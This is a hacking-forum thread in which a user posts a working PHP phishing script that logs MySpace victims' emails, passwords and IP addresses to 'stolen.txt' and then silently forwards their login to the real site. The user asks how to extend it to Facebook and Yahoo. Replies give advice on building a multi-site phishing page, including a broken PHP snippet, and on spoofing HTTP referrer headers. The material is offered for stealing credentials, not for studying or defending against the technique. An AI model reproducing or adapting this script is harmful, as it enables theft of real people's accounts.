network monitoring
+ Reply to Thread
Results 1 to 9 of 9

Thread: Nubs + PHP

  1. #1
    Join Date
    Sep 2007
    Posts
    9

    Lightbulb Nubs + PHP

    argh, is there anyway to get a php to send me ip, password and username/email without having to edit it for each individual site?

    This is what i currently use for MySpace...

    Code:
    <?php
    
    if(isset($_POST["email"]) && isset($_POST["password"]))
    {
    	$userEmail = $_POST["email"];
    	$userPassword = $_POST["password"];
    	$referer = $_SERVER["HTTP_REFERER"];
    	$ipAddress= $_SERVER["REMOTE_ADDR"];
    	$logLine = "
    Email: $userEmail
    Password: $userPassword
    IP address: $ipAddress
    Referrer: $referer
    ";
    
    	if(!$logHandle = fopen("stolen.txt", "a"))
    	{
    		print("Can't open the file.  Exiting...");
    		exit(0);
    	}
    
    	if(!fwrite($logHandle, $logLine))
    	{
    		print("Couldn't write to the file.  Exiting...");
    		exit(0);
    	}
    
    	fclose($logHandle);
    	print("
    <html>
    <head>
    </head>
    <body>
    <form method=\"post\" action=\"http://login.myspace.com/index.cfm?fuseaction=login.process\" id=\"myspace_form\">
    <input name=\"Login\" type=\"hidden\" value=\"" . $_POST["Login"] . "\" />
    <input name=\"email\" type=\"hidden\" value=\"" . $_POST["email"] . "\" />
    <input name=\"password\" type=\"hidden\" value=\"" . $_POST["password"] . "\" />
    <input name=\"Remember\" type=\"hidden\" value=\"" . $_POST["Remember"] . "\" />
    </form>
    <script type=\"text/javascript\">
    document.getElementById(\"myspace_form\").submit();
    </script>
    </body>
    </html>
    ");
    }
    
    ?>
    Is there anyway to make it so it can "theoretically" work with multiple sites? facebook, myspace and yahoo for example?
    -----------------
    Never argue with an idiot, they drag you down to their level and beat you with experience.

  2. #2
    Join Date
    Jan 2005
    Posts
    623
    First thought... you are just BEGGING to get hacked! You do not validate any of your data!

    VALIDATE you DATA!

    Anyways you can tweak your code to grab the website from the referrer inside a switch statment:
    [php]

    <?
    function find_redirect($referrer){

    if($preg_match('/^myspace^/',$referrer){
    return(*);
    }else if($preg_match('/^facebook^/',$referrer){
    return(2);
    }
    }

    switch(find_redirect($_SERVER["HTTP_REFERER"])){
    case *:
    // DO THIS FOR MYSPACE
    break;

    case 2:
    // DO THIS FOR FACEBOOK
    break
    }

    ?>
    [/php]
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
    [url=http://www.syntax******.info/tools/ip.php]Get An Ip Address[/url]
    [url=http://www.syntax******.info/tools/base_converter.php]Base Converter[/url]
    --------------------------------
    [URL=http://www.boninroad.com/syntax******/]Old Site[/URL]
    [URL=http://www.syntax******.info]Comming Soon[/URL]

  3. #3
    Join Date
    Sep 2005
    Posts
    2,050
    Syntax's idea of a multi-purpose phishing page would be the best solution, but you would need a good PHP knowledge in order to adapt it for all the different POST variables and possible redirections for each site.

    Really, you'd need that knowledge in order to change your script, whatever method you choose to use. Websites are way too varied in so many ways for a catch-all phishing script to be written -- they have different form input names, for example.

    I guess you could make a script that writes the entire POST array to a text file then redirects to Google (or the referrer), but that isn't a great way of accomplishing this.

    Whatever you do, you'd still need to modify the HTML file of each individual website so the form's action parameter is set you the URL of your phishing script.
    Last edited by Ezekiel; 09-15-2007 at 05:48 AM.

  4. #4
    Join Date
    Sep 2007
    Posts
    9
    I sorta just gave up on the whole "catch-all" phishing idea... decided to just make one for each site... it's much easier, and since i know very little about php, html, scripting, etc... it's probably the best way to go, learn a bit about each site and how they work, learn a bit how things would change/need to be changed...

    Thanks though.
    -----------------
    Never argue with an idiot, they drag you down to their level and beat you with experience.

  5. #5
    Join Date
    Jan 2005
    Posts
    623
    Can anyone give a working example of how to send a fake referrer URL using php. I've read a few, but they do not work. Microsoft (UK) was hacked because of this, and now I store all of my referrer information in Base64 knowing it can manipulated.

    If anyone has this information please post it! Sending a custom header via php. That would be a great tutorial if anyone knows enough about it.
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
    [url=http://www.syntax******.info/tools/ip.php]Get An Ip Address[/url]
    [url=http://www.syntax******.info/tools/base_converter.php]Base Converter[/url]
    --------------------------------
    [URL=http://www.boninroad.com/syntax******/]Old Site[/URL]
    [URL=http://www.syntax******.info]Comming Soon[/URL]

  6. #6
    Join Date
    Sep 2005
    Posts
    2,050
    Quote Originally Posted by SyntaX****** View Post
    Can anyone give a working example of how to send a fake referrer URL using php. I've read a few, but they do not work. Microsoft (UK) was hacked because of this, and now I store all of my referrer information in Base64 knowing it can manipulated.

    If anyone has this information please post it! Sending a custom header via php. That would be a great tutorial if anyone knows enough about it.
    To the best of my knowledge, that's impossible. Referrer headers are generated by the browser and can't be interfered with by the server.

    For example, you can redirect someone with this:

    Code:
    <?php
    header("Host: http://www.google.com/redirected.php");
    ?>
    Or with a meta tag redirect, but they will always send the referrer of the URL they came from.

    The only possible way I can see this happening would be if a XSS vulnerability was discovered on the target referrer site, then people given links which insert code to exploit the vulnerability and redirect them from this site to the destination.

  7. #7
    Join Date
    Jan 2005
    Posts
    623
    The referrer url can be completely spoofed. Thats why modules for IE give the referrer "None of your business". You can create headers in php, and send the fake headers to a url. My problem is I do not know how?

    A hacker sent fake referrers to Microsoft. Microsoft evidently saves referrers in a database in plain text. This referrer url hijacked the database giving the hacker full privledges.
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
    [url=http://www.syntax******.info/tools/ip.php]Get An Ip Address[/url]
    [url=http://www.syntax******.info/tools/base_converter.php]Base Converter[/url]
    --------------------------------
    [URL=http://www.boninroad.com/syntax******/]Old Site[/URL]
    [URL=http://www.syntax******.info]Comming Soon[/URL]

  8. #8
    Join Date
    Sep 2005
    Posts
    2,050
    Quote Originally Posted by SyntaX****** View Post
    The referrer url can be completely spoofed. Thats why modules for IE give the referrer "None of your business". You can create headers in php, and send the fake headers to a url. My problem is I do not know how?

    A hacker sent fake referrers to Microsoft. Microsoft evidently saves referrers in a database in plain text. This referrer url hijacked the database giving the hacker full privledges.
    I thought you were talking about forcing users' browsers to visit a different website with a spoofed referrer.

    When making the request yourself, it's easy. All you have to do is make a standard HTTP request with your desired referrer.

    See the PHP sockets page for info on how to do this in PHP:

    [url]http://www.php.net/sockets[/url]

    It could be done with telnet, if you wanted to bypass programming altogether.
    Who needs drugs when you have electrons?

  9. #9
    Join Date
    Sep 2006
    Posts
    1,649
    Or just use the refspoof extension for Firefox
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx

+ Reply to Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts